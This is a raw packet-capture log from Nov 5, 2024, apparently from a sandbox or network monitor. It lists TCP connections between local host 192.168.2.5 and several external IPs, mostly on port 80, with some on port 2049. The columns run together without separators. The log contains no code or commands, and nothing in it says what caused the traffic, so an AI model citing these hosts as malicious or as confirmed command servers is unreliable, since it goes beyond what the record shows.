                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.630990028 CET805977234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.631006956 CET805977234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.918653965 CET805977185.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.966443062 CET5977180192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.990473986 CET5977380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.995342970 CET805977347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.995446920 CET5977380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.998214960 CET5977380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.998214960 CET5977380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:12.003087997 CET805977347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:12.003108978 CET805977347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:12.593164921 CET805977234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:12.623369932 CET5977280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:12.631879091 CET805977234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:12.631953001 CET5977280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.189834118 CET5977480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.194720984 CET805977418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.194803953 CET5977480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.194984913 CET5977480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.195009947 CET5977480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.200206041 CET805977418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.200253010 CET805977418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.429471016 CET805977347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.452344894 CET5977380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.457568884 CET805977347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.457632065 CET5977380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.473407030 CET5977580192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.478837013 CET805977534.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.478933096 CET5977580192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.487149954 CET5977580192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.487179041 CET5977580192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.494791985 CET805977534.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:13.494961977 CET805977534.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.314207077 CET805977534.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.321583033 CET5977580192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.326739073 CET805977534.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.326811075 CET5977580192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.343970060 CET5977680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.350456953 CET805977647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.351087093 CET5977680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.351274014 CET5977680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.351294994 CET5977680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.356296062 CET805977647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.356336117 CET805977647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.644968033 CET805977418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.684412003 CET5977480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.690803051 CET805977418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:14.691078901 CET5977480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.057250977 CET5977780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.062057972 CET805977713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.062150955 CET5977780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.062376022 CET5977780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.062398911 CET5977780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.067591906 CET805977713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.067687035 CET805977713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.799179077 CET805977647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.799537897 CET5977680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.807095051 CET805977647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.807161093 CET5977680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.833929062 CET5977880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.839873075 CET805977818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.840888977 CET5977880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.842751980 CET5977880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.847057104 CET5977880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.847914934 CET805977818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.852746010 CET805977818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.928061962 CET597792049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.933491945 CET204959779212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.933561087 CET597792049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.934824944 CET597792049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.940047026 CET204959779212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.421989918 CET204959779212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.422128916 CET597792049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.422432899 CET597792049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.478646040 CET805977713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.478848934 CET5977780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.484327078 CET805977713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.486373901 CET5977780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.512398958 CET805977818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.514504910 CET5977880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.520297050 CET805977818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.520368099 CET5977880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.540669918 CET5978080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.546225071 CET805978013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.546415091 CET5978080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.546449900 CET5978080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.546497107 CET5978080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.551422119 CET805978013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.552228928 CET805978013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.478135109 CET5978180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.483028889 CET805978118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.483113050 CET5978180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.486206055 CET5978180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.487410069 CET5978180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.492235899 CET805978118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.493477106 CET805978118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.005286932 CET805978013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.008389950 CET5978080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.013843060 CET805978013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.013894081 CET5978080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.143543959 CET805978118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.147769928 CET5978180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.153407097 CET805978118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.153465033 CET5978180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.246767044 CET5978280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.252649069 CET805978234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.252722025 CET5978280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.252860069 CET5978280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.252876997 CET5978280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.257807016 CET805978234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.257980108 CET805978234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.908087969 CET5978380192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.913050890 CET805978318.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.913121939 CET5978380192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.913275957 CET5978380192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.913294077 CET5978380192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.918498039 CET805978318.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.918509007 CET805978318.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.223581076 CET805978234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.223913908 CET5978280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.229491949 CET805978234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.229552031 CET5978280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.241384029 CET5978480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.246319056 CET805978418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.246457100 CET5978480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.246568918 CET5978480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.246582031 CET5978480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.251368046 CET805978418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.252805948 CET805978418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.751663923 CET805978318.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.793845892 CET5978380192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.870296955 CET805978318.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.870448112 CET5978380192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.243855953 CET5978380192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.249428988 CET805978318.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.539422989 CET5978580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.544296026 CET805978544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.544361115 CET5978580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.544490099 CET5978580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.544518948 CET5978580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.549861908 CET805978544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.549875021 CET805978544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.561213970 CET8059698165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.561269999 CET5969880192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.561322927 CET5969880192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.566229105 CET8059698165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.683882952 CET805978418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.684272051 CET5978480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.689507008 CET805978418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.689583063 CET5978480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.701678038 CET5978680192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.706464052 CET805978613.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.706641912 CET5978680192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.707015991 CET5978680192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.707015991 CET5978680192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.712429047 CET805978613.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.712460995 CET805978613.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.218708992 CET805978544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.218892097 CET5978580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.224678040 CET805978544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.224735975 CET5978580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.439023018 CET597872049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.657054901 CET5978880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.671576023 CET204959787212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.671607971 CET805978854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.672914028 CET5978880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.673212051 CET5978880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.673212051 CET5978880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.674101114 CET597872049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.674101114 CET597872049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.677997112 CET805978854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.678376913 CET805978854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.678950071 CET204959787212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.132050037 CET805978613.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.132401943 CET5978680192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.137972116 CET805978613.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.138040066 CET5978680192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.147335052 CET5978980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.155277014 CET805978918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.155344963 CET5978980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.155771017 CET5978980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.155771017 CET5978980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.160645008 CET204959787212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.160711050 CET805978918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.160765886 CET597872049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.160779953 CET805978918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.161058903 CET597872049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.540344000 CET805978854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.540894985 CET5978880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.546015024 CET805978854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.546075106 CET5978880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.824342012 CET805978918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.824915886 CET5978980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.830332041 CET805978918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.830655098 CET5978980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.840806007 CET5979080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.845660925 CET805979018.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.847075939 CET5979080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.847208023 CET5979080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.847224951 CET5979080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.852498055 CET805979018.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.852510929 CET805979018.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.875572920 CET5979180192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.880464077 CET80597913.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.880533934 CET5979180192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.880805969 CET5979180192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.880831003 CET5979180192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.885677099 CET80597913.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.885689974 CET80597913.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.684005976 CET805979018.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.684267998 CET5979080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.689971924 CET805979018.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.690119982 CET5979080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.707657099 CET5979280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.712600946 CET805979244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.714694977 CET5979280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.716886997 CET5979280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.716886997 CET5979280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.721857071 CET805979244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.721976042 CET805979244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.848691940 CET80597913.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.848900080 CET5979180192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.854094982 CET80597913.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.856271029 CET5979180192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.182868004 CET5979380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.187794924 CET805979318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.188004017 CET5979380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.188321114 CET5979380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.188321114 CET5979380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.193151951 CET805979318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.193166018 CET805979318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.368329048 CET805979244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.368915081 CET5979280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.374033928 CET805979244.221.84.105192.168.2.5
